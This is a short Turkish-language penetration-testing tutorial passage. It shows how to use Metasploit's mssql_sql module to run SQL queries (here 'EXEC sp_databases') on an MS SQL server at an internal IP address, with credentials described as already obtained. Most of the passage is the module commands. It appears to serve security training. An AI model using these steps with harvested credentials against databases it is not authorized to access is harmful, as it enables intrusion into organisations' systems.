Kurum ağında 10.20.30.72 IP adresindeki MS SQL veritabanına ait erişim bilgileri, “Test/Tt123456” olarak elde edilmiş olsun. Bu kullanıcının hakları ile, veritabanında SQL sorguları çalıştırmak için MSF mssql_sql modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.
search mssql_sql
use auxiliary/admin/mssql/mssql_sql
show options
Modüle IP adresi, erişim için gerekli kimlik bilgisi verilerek modül seçenekleri ayarlanabilir.
set RHOST 10.20.30.72
set USERNAME Test
set PASSWORD Tt123456
set SQL EXEC sp_databases
show options
Seçenekler ayarlandırıldıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında modüle parametre olarak verilen kullanıcı hakları ile belirtilen SQL komutu çalıştırılır.
run